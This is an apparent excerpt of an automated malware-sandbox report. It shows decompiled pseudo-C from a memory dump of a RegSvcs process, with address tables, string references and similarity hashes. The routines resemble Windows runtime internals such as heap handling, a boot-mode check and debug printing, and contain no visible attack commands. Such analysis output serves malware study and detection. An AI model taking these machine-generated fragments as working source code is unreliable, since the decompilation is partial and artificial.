							_push( *((intOrPtr*)(_t179 + 4)));
							_push( *_t179);
							_push(0x8000);
							E00B0AFDE( &_v72,  &_v60);
						}
						L46:
						return _t166;
					}
					_t90 =  *(_t179 + 0xc) & 0x40000000;
					asm("sbb edi, edi");
					_t172 = ( ~_t90 & 0x0000003c) + 4;
					if(_t90 != 0) {
						_push(0);
						_push(0x14);
						_push( &_v44);
						_push(3);
						_push(_t179);
						_push(0xffffffff);
						if(E00A89730() < 0 || (_v40 & 0x00000060) == 0 || _v44 != _t179) {
							_push(_t139);
							E00B0A80D(_t179, 1, _v40, 0);
							_t172 = 4;
						}
					}
					_t141 =  &_v72;
					if(E00B0A854(_t141,  &_v60, 0, 0x2000, _t172, _t179,  *_t179,  *((intOrPtr*)(_t179 + 4))) >= 0) {
						_v64 = _a4;
						_t94 =  *(_t179 + 0xc) & 0x40000000;
						asm("sbb edi, edi");
						_t176 = ( ~_t94 & 0x0000003c) + 4;
						if(_t94 != 0) {
							_push(0);
							_push(0x14);
							_push( &_v24);
							_push(3);
							_push(_t179);
							_push(0xffffffff);
							if(E00A89730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t179) {
								_push(_t141);
								E00B0A80D(_t179, 1, _v20, 0);
								_t176 = 4;
							}
						}
						if(E00B0A854( &_v72,  &_v64, 0, 0x1000, _t176, 0,  *_t179,  *((intOrPtr*)(_t179 + 4))) < 0) {
							goto L11;
						} else {
							_t177 = _v64;
							 *((intOrPtr*)(_t132 + 0xc)) = _v72;
							_t100 = _v52 + _v52;
							_t146 =  *(_t132 + 0x10) & 0x00000ffd | _t177 & 0xfffff000 | _t100;
							 *(_t132 + 0x10) = _t146;
							asm("bsf eax, [esp+0x18]");
							_v52 = _t100;
							 *(_t132 + 0x10) = (_t100 << 0x00000002 ^ _t146) & 0x000000fc ^ _t146;
							 *((short*)(_t132 + 0xc)) = _t177 - _v48;
							_t47 =  &_a8;
							 *_t47 = _a8 & 0x00000001;
							if( *_t47 == 0) {
								E00A62280(_t179 + 0x30, _t179 + 0x30);
							}
							_t147 =  *(_t179 + 0x34);
							_t159 =  *(_t179 + 0x38) & 1;
							_v68 = 0;
							if(_t147 == 0) {
								L35:
								E00A5B090(_t179 + 0x34, _t147, _v68, _t132);
								if(_a8 == 0) {
									E00A5FFB0(_t132, _t177, _t179 + 0x30);
								}
								asm("lock xadd [eax], ecx");
								asm("lock xadd [eax], edx");
								_t132 = 0;
								_v72 = _v72 & 0;
								_v68 = _v72;
								if(E00A67D50() == 0) {
									_t113 = 0x7ffe0388;
								} else {
									_t177 = _v64;
									_t113 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
								}
								if( *_t113 == _t132) {
									_t166 = _v68;
									goto L46;
								} else {
									_t166 = _v68;
									E00AFFEC0(_t132, _t179, _t166, _t177 + 0x1000);
									goto L12;
								}
							} else {
								L23:
								while(1) {
									if(_v72 < ( *(_t147 + 0xc) & 0xffff0000)) {
										_t122 =  *_t147;
										if(_t159 == 0) {
											L32:
											if(_t122 == 0) {
												L34:
												_v68 = 0;
												goto L35;
											}
											L33:
											_t147 = _t122;
											continue;
										}
										if(_t122 == 0) {
											goto L34;
										}
										_t122 = _t122 ^ _t147;
										goto L32;
									}
									_t122 =  *(_t147 + 4);
									if(_t159 == 0) {
										L27:
										if(_t122 != 0) {
											goto L33;
										}
										L28:
										_v68 = 1;
										goto L35;
									}
									if(_t122 == 0) {
										goto L28;
									}
									_t122 = _t122 ^ _t147;
									goto L27;
								}
							}
						}
					}
					_v72 = _v72 & 0x00000000;
					goto L11;
				}
			}

0x00b0e547
0x00b0e549
0x00b0e54f
0x00b0e553
0x00b0e557
0x00b0e55a
0x00b0e55c
0x00b0e55f
0x00b0e561
0x00b0e567
0x00b0e56b
0x00b0e7e2
0x00000000
0x00b0e571
0x00b0e575
0x00b0e577
0x00b0e57b
0x00b0e57c
0x00b0e57d
0x00b0e57e
0x00b0e57f
0x00b0e588
0x00b0e58f
0x00b0e591
0x00b0e592
0x00b0e592
0x00b0e596
0x00b0e59e
0x00b0e5a0
0x00b0e5a6
0x00b0e61d
0x00b0e61d
0x00b0e621
0x00b0e623
0x00b0e630
0x00b0e630
0x00b0e7e6
0x00b0e7eb
0x00b0e7ed
0x00b0e7f4
0x00b0e7fa
0x00b0e7ff
0x00b0e7ff
0x00b0e80a
0x00b0e812
0x00b0e812
0x00b0e5ab
0x00b0e5b4
0x00b0e5b9
0x00b0e5be
0x00b0e5c0
0x00b0e5c2
0x00b0e5c8
0x00b0e5c9
0x00b0e5cb
0x00b0e5cc
0x00b0e5d5
0x00b0e5e4
0x00b0e5f1
0x00b0e5f8
0x00b0e5f8
0x00b0e5d5
0x00b0e602
0x00b0e616
0x00b0e63d
0x00b0e644
0x00b0e64d
0x00b0e652
0x00b0e657
0x00b0e659
0x00b0e65b
0x00b0e661
0x00b0e662
0x00b0e664
0x00b0e665
0x00b0e66e
0x00b0e67d
0x00b0e68a
0x00b0e691
0x00b0e691
0x00b0e66e
0x00b0e6b0
0x00000000
0x00b0e6b6
0x00b0e6bd
0x00b0e6c7
0x00b0e6d7
0x00b0e6d9
0x00b0e6db
0x00b0e6de
0x00b0e6e3
0x00b0e6f3
0x00b0e6fc
0x00b0e700
0x00b0e700
0x00b0e704
0x00b0e70a
0x00b0e70a
0x00b0e713
0x00b0e716
0x00b0e719
0x00b0e720
0x00b0e761
0x00b0e76b
0x00b0e774
0x00b0e77a
0x00b0e77a
0x00b0e78a
0x00b0e791
0x00b0e799
0x00b0e79b
0x00b0e79f
0x00b0e7aa
0x00b0e7c0
0x00b0e7ac
0x00b0e7b2
0x00b0e7b9
0x00b0e7b9
0x00b0e7c7
0x00b0e806
0x00000000
0x00b0e7c9
0x00b0e7d1
0x00b0e7d8
0x00000000
0x00b0e7d8
0x00000000
0x00000000
0x00b0e722
0x00b0e72e
0x00b0e748
0x00b0e74c
0x00b0e754
0x00b0e756
0x00b0e75c
0x00b0e75c
0x00000000
0x00b0e75c
0x00b0e758
0x00b0e758
0x00000000
0x00b0e758
0x00b0e750
0x00000000
0x00000000
0x00b0e752
0x00000000
0x00b0e752
0x00b0e730
0x00b0e735
0x00b0e73d
0x00b0e73f
0x00000000
0x00000000
0x00b0e741
0x00b0e741
0x00000000
0x00b0e741
0x00b0e739
0x00000000
0x00000000
0x00b0e73b
0x00000000
0x00b0e73b
0x00b0e722
0x00b0e720
0x00b0e6b0
0x00b0e618
0x00000000
0x00b0e618

Strings

`, xrefs: 00B0E670
`, xrefs: 00B0E5D7

Memory Dump Source

Source File: 00000005.00000002.384204170.0000000000A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a20000_RegSvcs.jbxd

Similarity

API ID:
String ID: `$`
API String ID: 0-197956300
Opcode ID: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
Instruction ID: a5ca321d1d9e7cb7dc934f6ca40eb86a203fad022e255a8502baa0ee47ccb00a
Opcode Fuzzy Hash: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
Instruction Fuzzy Hash: ED918A312043419FE724CE25C941B2BBBE6EF84714F188D6DF9A9CA2D1E775E804CB52

Uniqueness

Uniqueness Score: -1.00%

Function 00AC51BE Relevance: 2.7, Strings: 2, Instructions: 173
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E00AC51BE(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				signed short* _t63;
				signed int _t64;
				signed int _t65;
				signed int _t67;
				intOrPtr _t74;
				intOrPtr _t84;
				intOrPtr _t88;
				intOrPtr _t94;
				void* _t100;
				void* _t103;
				intOrPtr _t105;
				signed int _t106;
				short* _t108;
				signed int _t110;
				signed int _t113;
				signed int* _t115;
				signed short* _t117;
				void* _t118;
				void* _t119;

				_push(0x80);
				_push(0xb205f0);
				E00A9D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t118 - 0x80)) = __edx;
				_t115 =  *(_t118 + 0xc);
				 *(_t118 - 0x7c) = _t115;
				 *((char*)(_t118 - 0x65)) = 0;
				 *((intOrPtr*)(_t118 - 0x64)) = 0;
				_t113 = 0;
				 *((intOrPtr*)(_t118 - 0x6c)) = 0;
				 *((intOrPtr*)(_t118 - 4)) = 0;
				_t100 = __ecx;
				if(_t100 == 0) {
					 *(_t118 - 0x90) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
					E00A5EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					 *((char*)(_t118 - 0x65)) = 1;
					_t63 =  *(_t118 - 0x90);
					_t101 = _t63[2];
					_t64 =  *_t63 & 0x0000ffff;
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					L20:
					_t65 = _t64 >> 1;
					L21:
					_t108 =  *((intOrPtr*)(_t118 - 0x80));
					if(_t108 == 0) {
						L27:
						 *_t115 = _t65 + 1;
						_t67 = 0xc0000023;
						L28:
						 *((intOrPtr*)(_t118 - 0x64)) = _t67;
						L29:
						 *((intOrPtr*)(_t118 - 4)) = 0xfffffffe;
						E00AC53CA(0);
						return E00A9D130(0, _t113, _t115);
					}
					if(_t65 >=  *((intOrPtr*)(_t118 + 8))) {
						if(_t108 != 0 &&  *((intOrPtr*)(_t118 + 8)) >= 1) {
							 *_t108 = 0;
						}
						goto L27;
					}
					 *_t115 = _t65;
					_t115 = _t65 + _t65;
					E00A8F3E0(_t108, _t101, _t115);
					 *((short*)(_t115 +  *((intOrPtr*)(_t118 - 0x80)))) = 0;
					_t67 = 0;
					goto L28;
				}
				_t103 = _t100 - 1;
				if(_t103 == 0) {
					_t117 =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38;
					_t74 = E00A63690(1, _t117, 0xa21810, _t118 - 0x74);
					 *((intOrPtr*)(_t118 - 0x64)) = _t74;
					_t101 = _t117[2];
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					if(_t74 < 0) {
						_t64 =  *_t117 & 0x0000ffff;
						_t115 =  *(_t118 - 0x7c);
						goto L20;
					}
					_t65 = (( *(_t118 - 0x74) & 0x0000ffff) >> 1) + 1;
					_t115 =  *(_t118 - 0x7c);
					goto L21;
				}
				if(_t103 == 1) {
					_t105 = 4;
					 *((intOrPtr*)(_t118 - 0x78)) = _t105;
					 *((intOrPtr*)(_t118 - 0x70)) = 0;
					_push(_t118 - 0x70);
					_push(0);
					_push(0);
					_push(_t105);
					_push(_t118 - 0x78);
					_push(0x6b);
					 *((intOrPtr*)(_t118 - 0x64)) = E00A8AA90();
					 *((intOrPtr*)(_t118 - 0x64)) = 0;
					_t113 = L00A64620(_t105,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8,  *((intOrPtr*)(_t118 - 0x70)));
					 *((intOrPtr*)(_t118 - 0x6c)) = _t113;
					if(_t113 != 0) {
						_push(_t118 - 0x70);
						_push( *((intOrPtr*)(_t118 - 0x70)));
						_push(_t113);
						_push(4);
						_push(_t118 - 0x78);
						_push(0x6b);
						_t84 = E00A8AA90();
						 *((intOrPtr*)(_t118 - 0x64)) = _t84;
						if(_t84 < 0) {
							goto L29;
						}
						_t110 = 0;
						_t106 = 0;
						while(1) {
							 *((intOrPtr*)(_t118 - 0x84)) = _t110;
							 *(_t118 - 0x88) = _t106;
							if(_t106 >= ( *(_t113 + 0xa) & 0x0000ffff)) {
								break;
							}
							_t110 = _t110 + ( *(_t106 * 0x2c + _t113 + 0x21) & 0x000000ff);
							_t106 = _t106 + 1;
						}
						_t88 = E00AC500E(_t106, _t118 - 0x3c, 0x20, _t118 - 0x8c, 0, 0, L"%u", _t110);
						_t119 = _t119 + 0x1c;
						 *((intOrPtr*)(_t118 - 0x64)) = _t88;
						if(_t88 < 0) {
							goto L29;
						}
						_t101 = _t118 - 0x3c;
						_t65 =  *((intOrPtr*)(_t118 - 0x8c)) - _t118 - 0x3c >> 1;
						goto L21;
					}
					_t67 = 0xc0000017;
					goto L28;
				}
				_push(0);
				_push(0x20);
				_push(_t118 - 0x60);
				_push(0x5a);
				_t94 = E00A89860();
				 *((intOrPtr*)(_t118 - 0x64)) = _t94;
				if(_t94 < 0) {
					goto L29;
				}
				if( *((intOrPtr*)(_t118 - 0x50)) == 1) {
					_t101 = L"Legacy";
					_push(6);
				} else {
					_t101 = L"UEFI";
					_push(4);
				}
				_pop(_t65);
				goto L21;
			}

0x00ac51be
0x00ac51c3
0x00ac51c8
0x00ac51cd
0x00ac51d0
0x00ac51d3
0x00ac51d8
0x00ac51db
0x00ac51de
0x00ac51e0
0x00ac51e3
0x00ac51e6
0x00ac51e8
0x00ac5342
0x00ac5351
0x00ac5356
0x00ac535a
0x00ac5360
0x00ac5363
0x00ac5366
0x00ac5369
0x00ac5369
0x00ac536b
0x00ac536b
0x00ac5370
0x00ac53a3
0x00ac53a4
0x00ac53a6
0x00ac53ab
0x00ac53ab
0x00ac53ae
0x00ac53ae
0x00ac53b5
0x00ac53bf
0x00ac53bf
0x00ac5375
0x00ac5396
0x00ac53a0
0x00ac53a0
0x00000000
0x00ac5396
0x00ac5377
0x00ac5379
0x00ac537f
0x00ac538c
0x00ac5390
0x00000000
0x00ac5390
0x00ac51ee
0x00ac51f1
0x00ac5301
0x00ac5310
0x00ac5315
0x00ac5318
0x00ac531b
0x00ac5320
0x00ac532e
0x00ac5331
0x00000000
0x00ac5331
0x00ac5328
0x00ac5329
0x00000000
0x00ac5329
0x00ac51fa
0x00ac5235
0x00ac5236
0x00ac5239
0x00ac523f
0x00ac5240
0x00ac5241
0x00ac5242
0x00ac5246
0x00ac5247
0x00ac524e
0x00ac5251
0x00ac5267
0x00ac5269
0x00ac526e
0x00ac527d
0x00ac527e
0x00ac5281
0x00ac5282
0x00ac5287
0x00ac5288
0x00ac528a
0x00ac528f
0x00ac5294
0x00000000
0x00000000
0x00ac529a
0x00ac529c
0x00ac529e
0x00ac529e
0x00ac52a4
0x00ac52b0
0x00000000
0x00000000
0x00ac52ba
0x00ac52bc
0x00ac52bc
0x00ac52d4
0x00ac52d9
0x00ac52dc
0x00ac52e1
0x00000000
0x00000000
0x00ac52e7
0x00ac52f4
0x00000000
0x00ac52f4
0x00ac5270
0x00000000
0x00ac5270
0x00ac51fc
0x00ac51fd
0x00ac5202
0x00ac5203
0x00ac5205
0x00ac520a
0x00ac520f
0x00000000
0x00000000
0x00ac521b
0x00ac5226
0x00ac522b
0x00ac521d
0x00ac521d
0x00ac5222
0x00ac5222
0x00ac522d
0x00000000

Strings

UEFI, xrefs: 00AC521D
Legacy, xrefs: 00AC5226

Memory Dump Source

Source File: 00000005.00000002.384204170.0000000000A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a20000_RegSvcs.jbxd

Similarity

API ID: InitializeThunk
String ID: Legacy$UEFI
API String ID: 2994545307-634100481
Opcode ID: 91a8d3bfb1f897c34170e76679eb77b913b40d4f9a943a9e875163376fa43499
Instruction ID: bd1d94423c297e409c781f6cb6dc55fb487cd400742dfafa1910c700a5c1254e
Opcode Fuzzy Hash: 91a8d3bfb1f897c34170e76679eb77b913b40d4f9a943a9e875163376fa43499
Instruction Fuzzy Hash: 28515A71E00A599FDB24DFA8C990FAEB7F8FB48740F15402DF509EB291DA70A980CB10

Uniqueness

Uniqueness Score: -1.00%

Function 00A4B171 Relevance: 1.7, APIs: 1, Instructions: 166
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 78%

			E00A4B171(signed short __ebx, intOrPtr __ecx, intOrPtr* __edx, intOrPtr* __edi, signed short __esi, void* __eflags) {
				signed int _t65;
				signed short _t69;
				intOrPtr _t70;
				signed short _t85;
				void* _t86;
				signed short _t89;
				signed short _t91;
				intOrPtr _t92;
				intOrPtr _t97;
				intOrPtr* _t98;
				signed short _t99;
				signed short _t101;
				void* _t102;
				char* _t103;
				signed short _t104;
				intOrPtr* _t110;
				void* _t111;
				void* _t114;
				intOrPtr* _t115;

				_t109 = __esi;
				_t108 = __edi;
				_t106 = __edx;
				_t95 = __ebx;
				_push(0x90);
				_push(0xb1f7a8);
				E00A9D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t114 - 0x9c)) = __edx;
				 *((intOrPtr*)(_t114 - 0x84)) = __ecx;
				 *((intOrPtr*)(_t114 - 0x8c)) =  *((intOrPtr*)(_t114 + 0xc));
				 *((intOrPtr*)(_t114 - 0x88)) =  *((intOrPtr*)(_t114 + 0x10));
				 *((intOrPtr*)(_t114 - 0x78)) =  *[fs:0x18];
				if(__edx == 0xffffffff) {
					L6:
					_t97 =  *((intOrPtr*)(_t114 - 0x78));
					_t65 =  *(_t97 + 0xfca) & 0x0000ffff;
					__eflags = _t65 & 0x00000002;
					if((_t65 & 0x00000002) != 0) {
						L3:
						L4:
						return E00A9D130(_t95, _t108, _t109);
					}
					 *(_t97 + 0xfca) = _t65 | 0x00000002;
					_t108 = 0;
					_t109 = 0;
					_t95 = 0;
					__eflags = 0;
					while(1) {
						__eflags = _t95 - 0x200;
						if(_t95 >= 0x200) {
							break;
						}
						E00A8D000(0x80);
						 *((intOrPtr*)(_t114 - 0x18)) = _t115;
						_t108 = _t115;
						_t95 = _t95 - 0xffffff80;
						_t17 = _t114 - 4;
						 *_t17 =  *(_t114 - 4) & 0x00000000;
						__eflags =  *_t17;
						_t106 =  *((intOrPtr*)(_t114 - 0x84));
						_t110 =  *((intOrPtr*)(_t114 - 0x84));
						_t102 = _t110 + 1;
						do {
							_t85 =  *_t110;
							_t110 = _t110 + 1;
							__eflags = _t85;
						} while (_t85 != 0);
						_t111 = _t110 - _t102;
						_t21 = _t95 - 1; // -129
						_t86 = _t21;
						__eflags = _t111 - _t86;
						if(_t111 > _t86) {
							_t111 = _t86;
						}
						E00A8F3E0(_t108, _t106, _t111);
						_t115 = _t115 + 0xc;
						_t103 = _t111 + _t108;
						 *((intOrPtr*)(_t114 - 0x80)) = _t103;
						_t89 = _t95 - _t111;
						__eflags = _t89;
						_push(0);
						if(_t89 == 0) {
							L15:
							_t109 = 0xc000000d;
							goto L16;
						} else {
							__eflags = _t89 - 0x7fffffff;
							if(_t89 <= 0x7fffffff) {
								L16:
								 *(_t114 - 0x94) = _t109;
								__eflags = _t109;
								if(_t109 < 0) {
									__eflags = _t89;
									if(_t89 != 0) {
										 *_t103 = 0;
									}
									L26:
									 *(_t114 - 0xa0) = _t109;
									 *(_t114 - 4) = 0xfffffffe;
									__eflags = _t109;
									if(_t109 >= 0) {
										L31:
										_t98 = _t108;
										_t39 = _t98 + 1; // 0x1
										_t106 = _t39;
										do {
											_t69 =  *_t98;
											_t98 = _t98 + 1;
											__eflags = _t69;
										} while (_t69 != 0);
										_t99 = _t98 - _t106;
										__eflags = _t99;
										L34:
										_t70 =  *[fs:0x30];
										__eflags =  *((char*)(_t70 + 2));
										if( *((char*)(_t70 + 2)) != 0) {
											L40:
											 *((intOrPtr*)(_t114 - 0x74)) = 0x40010006;
											 *(_t114 - 0x6c) =  *(_t114 - 0x6c) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x64)) = 2;
											 *(_t114 - 0x70) =  *(_t114 - 0x70) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x60)) = (_t99 & 0x0000ffff) + 1;
											 *((intOrPtr*)(_t114 - 0x5c)) = _t108;
											 *(_t114 - 4) = 1;
											_push(_t114 - 0x74);
											L00A9DEF0(_t99, _t106);
											 *(_t114 - 4) = 0xfffffffe;
											 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
											goto L3;
										}
										__eflags = ( *0x7ffe02d4 & 0x00000003) - 3;
										if(( *0x7ffe02d4 & 0x00000003) != 3) {
											goto L40;
										}
										_push( *((intOrPtr*)(_t114 + 8)));
										_push( *((intOrPtr*)(_t114 - 0x9c)));
										_push(_t99 & 0x0000ffff);
										_push(_t108);
										_push(1);
										_t101 = E00A8B280();
										__eflags =  *((char*)(_t114 + 0x14)) - 1;
										if( *((char*)(_t114 + 0x14)) == 1) {
											__eflags = _t101 - 0x80000003;
											if(_t101 == 0x80000003) {
												E00A8B7E0(1);
												_t101 = 0;
												__eflags = 0;
											}
										}
										 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
										goto L4;
									}
									__eflags = _t109 - 0x80000005;
									if(_t109 == 0x80000005) {
										continue;
									}
									break;
								}
								 *(_t114 - 0x90) = 0;
								 *((intOrPtr*)(_t114 - 0x7c)) = _t89 - 1;
								_t91 = E00A8E2D0(_t103, _t89 - 1,  *((intOrPtr*)(_t114 - 0x8c)),  *((intOrPtr*)(_t114 - 0x88)));
								_t115 = _t115 + 0x10;
								_t104 = _t91;
								_t92 =  *((intOrPtr*)(_t114 - 0x7c));
								__eflags = _t104;
								if(_t104 < 0) {
									L21:
									_t109 = 0x80000005;
									 *(_t114 - 0x90) = 0x80000005;
									L22:
									 *((char*)(_t92 +  *((intOrPtr*)(_t114 - 0x80)))) = 0;
									L23:
									 *(_t114 - 0x94) = _t109;
									goto L26;
								}
								__eflags = _t104 - _t92;
								if(__eflags > 0) {
									goto L21;
								}
								if(__eflags == 0) {
									goto L22;
								}
								goto L23;
							}
							goto L15;
						}
					}
					__eflags = _t109;
					if(_t109 >= 0) {
						goto L31;
					}
					__eflags = _t109 - 0x80000005;
					if(_t109 != 0x80000005) {
						goto L31;
					}
					 *((short*)(_t95 + _t108 - 2)) = 0xa;
					_t38 = _t95 - 1; // -129
					_t99 = _t38;
					goto L34;
				}
				if( *((char*)( *[fs:0x30] + 2)) != 0) {
					__eflags = __edx - 0x65;
					if(__edx != 0x65) {
						goto L2;
					}
					goto L6;
				}
				L2:
				_push( *((intOrPtr*)(_t114 + 8)));
				_push(_t106);
				if(E00A8A890() != 0) {
					goto L6;
				}
				goto L3;
			}

0x00a4b171
0x00a4b171
0x00a4b171
0x00a4b171
0x00a4b171
0x00a4b176
0x00a4b17b
0x00a4b180
0x00a4b186
0x00a4b18f
0x00a4b198
0x00a4b1a4
0x00a4b1aa
0x00aa4802
0x00aa4802
0x00aa4805
0x00aa480c
0x00aa480e
0x00a4b1d1
0x00a4b1d3
0x00a4b1de
0x00a4b1de
0x00aa4817
0x00aa481e
0x00aa4820
0x00aa4822
0x00aa4822
0x00aa4824
0x00aa4824
0x00aa482a
0x00000000
0x00000000
0x00aa4835
0x00aa483a
0x00aa483d
0x00aa483f
0x00aa4842
0x00aa4842
0x00aa4842
0x00aa4846
0x00aa484c
0x00aa484e
0x00aa4851
0x00aa4851
0x00aa4853
0x00aa4854
0x00aa4854
0x00aa4858
0x00aa485a
0x00aa485a
0x00aa485d
0x00aa485f
0x00aa4861
0x00aa4861
0x00aa4866
0x00aa486b
0x00aa486e
0x00aa4871
0x00aa4876
0x00aa4876
0x00aa4878
0x00aa487b
0x00aa4884
0x00aa4884
0x00000000
0x00aa487d
0x00aa487d
0x00aa4882
0x00aa4889
0x00aa4889
0x00aa488f
0x00aa4891
0x00aa48e0
0x00aa48e2
0x00aa48e4
0x00aa48e4
0x00aa48e7
0x00aa48e7
0x00aa48ed
0x00aa48f4
0x00aa48f6
0x00aa4951
0x00aa4951
0x00aa4953
0x00aa4953
0x00aa4956
0x00aa4956
0x00aa4958
0x00aa4959
0x00aa4959
0x00aa495d
0x00aa495d
0x00aa495f
0x00aa495f
0x00aa4965
0x00aa4969
0x00aa49ba
0x00aa49ba
0x00aa49c1
0x00aa49c5
0x00aa49cc
0x00aa49d4
0x00aa49d7
0x00aa49da
0x00aa49e4
0x00aa49e5
0x00aa49f3
0x00aa4a02
0x00000000
0x00aa4a02
0x00aa4972
0x00aa4974
0x00000000
0x00000000
0x00aa4976
0x00aa4979
0x00aa4982
0x00aa4983
0x00aa4984
0x00aa498b
0x00aa498d
0x00aa4991
0x00aa4993
0x00aa4999
0x00aa499d
0x00aa49a2
0x00aa49a2
0x00aa49a2
0x00aa4999
0x00aa49ac
0x00000000
0x00aa49b3
0x00aa48f8
0x00aa48fe
0x00000000
0x00000000
0x00000000
0x00aa48fe
0x00aa4895
0x00aa489c
0x00aa48ad
0x00aa48b2
0x00aa48b5
0x00aa48b7
0x00aa48ba
0x00aa48bc
0x00aa48c6
0x00aa48c6
0x00aa48cb
0x00aa48d1
0x00aa48d4
0x00aa48d8
0x00aa48d8
0x00000000
0x00aa48d8
0x00aa48be
0x00aa48c0
0x00000000
0x00000000
0x00aa48c2
0x00000000
0x00000000
0x00000000
0x00aa48c4
0x00000000
0x00aa4882
0x00aa487b
0x00aa4904
0x00aa4906
0x00000000
0x00000000
0x00aa4908
0x00aa490e
0x00000000
0x00000000
0x00aa4910
0x00aa4917
0x00aa4917
0x00000000
0x00aa4917
0x00a4b1ba
0x00aa47f9
0x00aa47fc
0x00000000
0x00000000
0x00000000
0x00aa47fc
0x00a4b1c0
0x00a4b1c0
0x00a4b1c3
0x00a4b1cb
0x00000000
0x00000000
0x00000000

APIs

_vswprintf_s.LIBCMT ref: 00AA48AD

Memory Dump Source

Source File: 00000005.00000002.384204170.0000000000A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a20000_RegSvcs.jbxd

Similarity

API ID: _vswprintf_s
String ID:
API String ID: 677850445-0
Opcode ID: 81a7a6b4df2fa8e2771733ea4c6221dc679f3ef62e4b257a182c386d1eb1d0ed
Instruction ID: cb171a5180670858906c2de9ab4a7e53bea74ef88cadee1a4846e56bf48a6ae6
Opcode Fuzzy Hash: 81a7a6b4df2fa8e2771733ea4c6221dc679f3ef62e4b257a182c386d1eb1d0ed
Instruction Fuzzy Hash: CD51E171D002598EDF31DF68C945BAEBBB0AF8A710F2042ADF859AB2C1D7B44D458B91

Uniqueness

Uniqueness Score: -1.00%

Function 00A6B944 Relevance: 1.7, APIs: 1, Instructions: 166
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E00A6B944(signed int* __ecx, char __edx) {
				signed int _v8;
				signed int _v16;
				signed int _v20;
				char _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				intOrPtr _v44;
				signed int* _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				char _v77;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t65;
				intOrPtr _t67;
				intOrPtr _t68;
				char* _t73;
				intOrPtr _t77;
				intOrPtr _t78;
				signed int _t82;
				intOrPtr _t83;
				void* _t87;
				char _t88;
				intOrPtr* _t89;
				intOrPtr _t91;
				void* _t97;
				intOrPtr _t100;
				void* _t102;
				void* _t107;
				signed int _t108;
				intOrPtr* _t112;
				void* _t113;
				intOrPtr* _t114;
				intOrPtr _t115;
				intOrPtr _t116;
				intOrPtr _t117;
				signed int _t118;
				void* _t130;

				_t120 = (_t118 & 0xfffffff8) - 0x4c;
				_v8 =  *0xb3d360 ^ (_t118 & 0xfffffff8) - 0x0000004c;
				_t112 = __ecx;
				_v77 = __edx;
				_v48 = __ecx;
				_v28 = 0;
				_t5 = _t112 + 0xc; // 0x575651ff
				_t105 =  *_t5;
				_v20 = 0;
				_v16 = 0;
				if(_t105 == 0) {
					_t50 = _t112 + 4; // 0x5de58b5b
					_t60 =  *__ecx |  *_t50;
					if(( *__ecx |  *_t50) != 0) {
						 *__ecx = 0;
						__ecx[1] = 0;
						if(E00A67D50() != 0) {
							_t65 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t65 = 0x7ffe0386;
						}
						if( *_t65 != 0) {
							E00B18CD6(_t112);
						}
						_push(0);
						_t52 = _t112 + 0x10; // 0x778df98b
						_push( *_t52);
						_t60 = E00A89E20();
					}
					L20:
					_pop(_t107);
					_pop(_t113);
					_pop(_t87);
					return E00A8B640(_t60, _t87, _v8 ^ _t120, _t105, _t107, _t113);
				}
				_t8 = _t112 + 8; // 0x8b000cc2
				_t67 =  *_t8;
				_t88 =  *((intOrPtr*)(_t67 + 0x10));
				_t97 =  *((intOrPtr*)(_t105 + 0x10)) - _t88;
				_t108 =  *(_t67 + 0x14);
				_t68 =  *((intOrPtr*)(_t105 + 0x14));
				_t105 = 0x2710;
				asm("sbb eax, edi");
				_v44 = _t88;
				_v52 = _t108;
				_t60 = E00A8CE00(_t97, _t68, 0x2710, 0);
				_v56 = _t60;
				if( *_t112 != _t88 ||  *(_t112 + 4) != _t108) {
					L3:
					 *(_t112 + 0x44) = _t60;
					_t105 = _t60 * 0x2710 >> 0x20;
					 *_t112 = _t88;
					 *(_t112 + 4) = _t108;
					_v20 = _t60 * 0x2710;
					_v16 = _t60 * 0x2710 >> 0x20;
					if(_v77 != 0) {
						L16:
						_v36 = _t88;
						_v32 = _t108;
						if(E00A67D50() != 0) {
							_t73 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t73 = 0x7ffe0386;
						}
						if( *_t73 != 0) {
							_t105 = _v40;
							E00B18F6A(_t112, _v40, _t88, _t108);
						}
						_push( &_v28);
						_push(0);
						_push( &_v36);
						_t48 = _t112 + 0x10; // 0x778df98b
						_push( *_t48);
						_t60 = E00A8AF60();
						goto L20;
					} else {
						_t89 = 0x7ffe03b0;
						do {
							_t114 = 0x7ffe0010;
							do {
								_t77 =  *0xb38628; // 0x0
								_v68 = _t77;
								_t78 =  *0xb3862c; // 0x0
